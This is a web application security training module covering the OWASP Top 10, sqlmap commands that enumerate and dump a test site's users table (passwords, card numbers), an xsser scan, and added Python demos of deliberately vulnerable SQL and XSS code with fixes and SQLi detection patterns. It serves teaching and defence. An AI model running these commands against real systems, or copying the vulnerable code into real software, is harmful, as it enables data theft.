Web Application Hacking

Uploaded by

orebakintoluwani
© All Rights Reserved

MODULE 15: WEB APPLICATION HACKING

MODULE OBJECTIVE
The course focuses on common security threats to web applications and the
countermeasure strategies available against them. Its primary aim is to educate
developers, designers, architects and organizations about the consequences of
the most common web application security vulnerabilities and the methodology
for protecting against them. At the end of this course you will learn:

- How to identify, exploit and mitigate web application vulnerabilities.


TOPICS

- Introduction To OWASP.
- OWASP Top 10.
- Tools For Web Application Testing.


INTRODUCTION TO OWASP

The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software.

OWASP TOP 10

The OWASP Top 10 is the project's ranked list of the most critical web application security risks. The 2021 edition:

- A01:2021 Broken Access Control
- A02:2021 Cryptographic Failures
- A03:2021 Injection
- A04:2021 Insecure Design
- A05:2021 Security Misconfiguration
- A06:2021 Vulnerable and Outdated Components
- A07:2021 Identification and Authentication Failures
- A08:2021 Software and Data Integrity Failures
- A09:2021 Security Logging and Monitoring Failures
- A10:2021 Server-Side Request Forgery (SSRF)

WHAT CHANGED FROM 2017 TO 2021?

- Broken Access Control moved from fifth to first.
- Injection dropped from first to third, and Cross-Site Scripting (A7:2017) is now part of it.
- Sensitive Data Exposure (A3:2017) was renamed Cryptographic Failures and moved to second.
- XML External Entities (A4:2017) was folded into Security Misconfiguration.
- Insecure Deserialization (A8:2017) was folded into the new Software and Data Integrity Failures category.
- Using Components with Known Vulnerabilities was renamed Vulnerable and Outdated Components.
- Insufficient Logging and Monitoring was renamed Security Logging and Monitoring Failures.
- Insecure Design and Server-Side Request Forgery are new categories.

TOOLS FOR WEB APPLICATION TESTING

- sqlmap (SQL injection)
- xsser & BeEF (cross-site scripting)
- Burp Suite
- OWASP ZAP

SQL INJECTION WITH SQLMAP

SQL Injection With sqlmap. Each command reads the saved HTTP request from the file given with -r, sends its traffic through the local proxy on 127.0.0.1:8080 (Burp Suite listening there, so every request can be inspected), applies the space2comment tamper script (spaces in the payload are replaced with /**/ comments) and tests only the parameter named with -p. The four steps enumerate databases, then tables, then columns, then dump the selected columns:

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test --dbs

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D acuart --tables

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D acuart -T users --columns

sqlmap -r /home/kali/Desktop/log --proxy=http://127.0.0.1:8080 --tamper=space2comment -p test -D acuart -T users -C name,pass,email,phone,address,cc,cart --dump
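
The following is an added example and is not part of the module or of sqlmap. It shows the defect sqlmap is exploiting when it reports the "test" parameter as injectable (the request value pasted into the SQL text), the parameterized-query fix, and, on the detection side, why a request-log check that matches raw values misses payloads once the space2comment tamper has replaced spaces with /**/ comments, and how normalizing the value first restores the match. The SQLite table, rows and access-log lines are constructed for the demo and only stand in for the acuart.users table named in the slides.

```python
# Added example, not part of the module: the injection defect behind the "test"
# parameter, the parameterized fix, and a log check that survives space2comment.
# Table, rows and log lines below are constructed for this demo.
import re
import sqlite3
from urllib.parse import unquote_plus


def make_db():
    """Constructed in-memory stand-in for the users table the slides dump."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pass TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "s3cret", "alice@example.com"),
        ("bob", "hunter2", "bob@example.com"),
    ])
    return db


def vulnerable_lookup(db, test):
    """Deliberately vulnerable: the request value becomes part of the SQL text,
    so quotes and comments inside it are parsed as SQL."""
    sql = "SELECT name, email FROM users WHERE name = '" + test + "'"
    return db.execute(sql).fetchall()


def safe_lookup(db, test):
    """Fixed: a bound parameter is sent as data and is never parsed as SQL."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return db.execute(sql, (test,)).fetchall()


# Detection side: the quote-OR-quote tautology and UNION SELECT, as a minimal signature set.
SQLI_PATTERNS = [
    r"'\s*or\s*'[^']*'\s*=\s*'",      # ' OR '1'='1
    r"\bunion\s+(all\s+)?select\b",   # UNION SELECT
]


def naive_looks_like_sqli(raw_value):
    """Matches the value as-is; /**/ in place of spaces breaks the \\s* in the patterns."""
    return any(re.search(p, raw_value.lower()) for p in SQLI_PATTERNS)


def looks_like_sqli(raw_value):
    """URL-decodes, then turns inline comments back into spaces before matching,
    so the space2comment transformation no longer hides the keyword structure."""
    text = unquote_plus(raw_value)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return any(re.search(p, text.lower()) for p in SQLI_PATTERNS)


def scan_log_lines(lines):
    """Returns the decoded 'test' values flagged in the given access-log lines."""
    flagged = []
    for line in lines:
        m = re.search(r"[?&]test=([^&\s]*)", line)
        if m and looks_like_sqli(m.group(1)):
            flagged.append(unquote_plus(m.group(1)))
    return flagged


# Constructed sample lines (not real traffic): one benign request, one tampered payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?test=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?test=x%27%2F%2A%2A%2FOR%2F%2A%2A%2F%271%27%3D%271 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    db = make_db()
    payload = "x'/**/OR/**/'1'='1"   # what space2comment produces from x' OR '1'='1
    print("vulnerable:", vulnerable_lookup(db, payload))    # every row comes back
    print("safe:", safe_lookup(db, payload))                # no row has that literal name
    print("naive match:", naive_looks_like_sqli(payload))   # False: the comments hide it
    print("normalized:", looks_like_sqli(payload))          # True
    print("flagged:", scan_log_lines(SAMPLE_LOG))
```

SQLite treats /**/ as whitespace exactly as MySQL does, so the vulnerable query still evaluates the OR clause; the fixed query never sees the value as SQL, whatever tamper script was used. The same lesson applies to the detection rule: match on the value after decoding and comment-stripping, not on the raw bytes.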

CROSS SITE SCRIPTING (XSS) WITH XSSER

Detecting Cross Site Scripting Vulnerability With xsser:

Installing xsser if not installed:

sudo apt install xsser

Usage (-u gives the target host and -g the GET path to test; the literal XSS marks where the tool places its payloads):

sudo xsser -u 'http://test.vulnweb.com' -g '/listproducts.php?cat=XSS'
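
The following is an added example and is not part of the module or of xsser. It shows what the scanner is probing for at the point the slides mark with XSS: a page that writes the cat parameter back into its HTML without encoding, the output-encoding fix, and the reflection check itself, done with a harmless marker instead of a script payload. The page template and product data are constructed for the demo and are not the real application.

```python
# Added example, not part of the module: reflected XSS through the "cat"
# parameter of a product listing, and the output-encoding fix.
# The template and product data are constructed for this demo.
import html
from urllib.parse import parse_qs, quote

# Constructed sample data standing in for the product listing.
PRODUCTS = {"1": ["Network Storage", "Posters"], "2": ["Monitors"]}


def _category(query_string):
    """Pulls the raw (URL-decoded) cat value out of the query string."""
    return parse_qs(query_string).get("cat", [""])[0]


def render_vulnerable(query_string):
    """Deliberately vulnerable: the request value is written straight into the
    HTML, so any markup it contains becomes part of the page the browser runs."""
    raw = _category(query_string)
    items = "".join("<li>%s</li>" % p for p in PRODUCTS.get(raw, []))
    return "<h2>Category: " + raw + "</h2><ul>" + items + "</ul>"


def render_safe(query_string):
    """Fixed: HTML-encode every untrusted value for the context it lands in, so
    the browser displays the characters instead of parsing them as tags."""
    raw = _category(query_string)
    items = "".join("<li>%s</li>" % html.escape(p) for p in PRODUCTS.get(raw, []))
    return "<h2>Category: " + html.escape(raw, quote=True) + "</h2><ul>" + items + "</ul>"


def reflects_unescaped(render, marker="<xss_probe>"):
    """The check a scanner makes at the injection point: send a harmless marker
    containing markup characters and see whether it comes back verbatim."""
    page = render("cat=" + quote(marker, safe=""))
    return marker in page


if __name__ == "__main__":
    print("vulnerable reflects markup:", reflects_unescaped(render_vulnerable))  # True
    print("fixed reflects markup:", reflects_unescaped(render_safe))             # False
    print(render_safe("cat=" + quote("<b>1", safe="")))
```

The check is deliberately a marker rather than a script: a page that returns the angle brackets unchanged will also return a real payload unchanged, so the marker is enough to decide whether encoding is missing. Encoding must be applied at output, for the exact context (HTML body here; attribute and JavaScript contexts need their own rules), not by stripping characters from the input.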

SUMMARY

This module aims at identifying flaws or weaknesses in a web-based application.

Largely due to unvalidated or unsanitized form inputs, misconfigured web
servers, and application design flaws, these weaknesses can be exploited to
compromise the application's security. They are not the same as other common
types of vulnerabilities, such as network or asset vulnerabilities: they arise
because web applications must interact with multiple users across multiple
networks, and that level of accessibility is easily taken advantage of by hackers.